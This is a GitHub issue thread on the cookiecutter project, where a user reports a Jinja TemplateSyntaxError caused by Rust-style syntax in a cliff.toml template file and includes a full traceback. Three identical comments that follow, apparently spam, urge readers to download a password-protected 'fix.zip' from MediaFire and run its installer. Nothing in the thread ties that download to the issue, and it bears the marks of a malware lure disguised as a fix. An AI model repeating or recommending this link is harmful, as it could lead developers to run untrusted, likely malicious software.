### ISSUE TITLE
how to handle the `cliff.toml` in the cookiecutter template

### ISSUE THREAD

**Issue by pplmx** [cookiecutter/cookiecutter#2092]
* Cookiecutter version: 2.6.0
* Template project url: [x-pt/template](https://github.com/x-pt/template/tree/feat_auto_release_in_boilerplate/template/py)
* Python version: 3.12.5
* Operating System: macOS Sequoia Version 15.0 Beta (24A5327a)

### Description:

I attempted to use {% raw %}...{% endraw %} in the template to skip some lines, but it did not work as expected.

### What I've run:

```
cookiecutter -c feat_auto_release_in_boilerplate gh:x-pt/template --directory template/py
```

### Its Output

<details>
<summary>console log</summary>

```console
cookiecutter template/template/py
  [1/8] Enter your project name (My Awesome Project):
  [2/8] Generated project identifier (slug) (my-awesome-project):
  [3/8] Generated package/module name (my_awesome_project):
  [4/8] Brief project description (A nice python project):
  [5/8] Author's full name (Firstname Lastname):
  [6/8] Author's email address (email@example.com):
  [7/8] GitHub username or organization (your-org-or-username):
  [8/8] python_version (3.10):
Traceback (most recent call last):
  File "/Users/skynet/.local/bin/cookiecutter", line 8, in <module>
    sys.exit(main())
             ^^^^^^
  File "/Users/skynet/.local/share/uv/tools/cookiecutter/lib/python3.12/site-packages/click/core.py", line 1157, in __call__
    return self.main(*args, **kwargs)
           ^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/Users/skynet/.local/share/uv/tools/cookiecutter/lib/python3.12/site-packages/click/core.py", line 1078, in main
    rv = self.invoke(ctx)
         ^^^^^^^^^^^^^^^^
  File "/Users/skynet/.local/share/uv/tools/cookiecutter/lib/python3.12/site-packages/click/core.py", line 1434, in invoke
    return ctx.invoke(self.callback, **ctx.params)
           ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/Users/skynet/.local/share/uv/tools/cookiecutter/lib/python3.12/site-packages/click/core.py", line 783, in invoke
    return __callback(*args, **kwargs)
           ^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/Users/skynet/.local/share/uv/tools/cookiecutter/lib/python3.12/site-packages/cookiecutter/cli.py", line 203, in main
    cookiecutter(
  File "/Users/skynet/.local/share/uv/tools/cookiecutter/lib/python3.12/site-packages/cookiecutter/main.py", line 182, in cookiecutter
    result = generate_files(
             ^^^^^^^^^^^^^^^
  File "/Users/skynet/.local/share/uv/tools/cookiecutter/lib/python3.12/site-packages/cookiecutter/generate.py", line 409, in generate_files
    generate_file(
  File "/Users/skynet/.local/share/uv/tools/cookiecutter/lib/python3.12/site-packages/cookiecutter/generate.py", line 203, in generate_file
    tmpl = env.get_template(infile_fwd_slashes)
           ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/Users/skynet/.local/share/uv/tools/cookiecutter/lib/python3.12/site-packages/jinja2/environment.py", line 1013, in get_template
    return self._load_template(name, globals)
           ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/Users/skynet/.local/share/uv/tools/cookiecutter/lib/python3.12/site-packages/jinja2/environment.py", line 972, in _load_template
    template = self.loader.load(self, name, self.make_globals(globals))
               ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/Users/skynet/.local/share/uv/tools/cookiecutter/lib/python3.12/site-packages/jinja2/loaders.py", line 138, in load
    code = environment.compile(source, name, filename)
           ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/Users/skynet/.local/share/uv/tools/cookiecutter/lib/python3.12/site-packages/jinja2/environment.py", line 768, in compile
    self.handle_exception(source=source_hint)
  File "/Users/skynet/.local/share/uv/tools/cookiecutter/lib/python3.12/site-packages/jinja2/environment.py", line 939, in handle_exception
    raise rewrite_traceback_stack(source=source)
  File "cliff.toml", line 54, in template
jinja2.exceptions.TemplateSyntaxError: expected token 'end of print statement', got ':'
  File "cliff.toml", line 54
    {{ self::print_commit(commit=commit) }}
```

</details>

**Comment by Qsgz2023ji5ban** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by HaxBaba123** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by HaxBaba123** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."
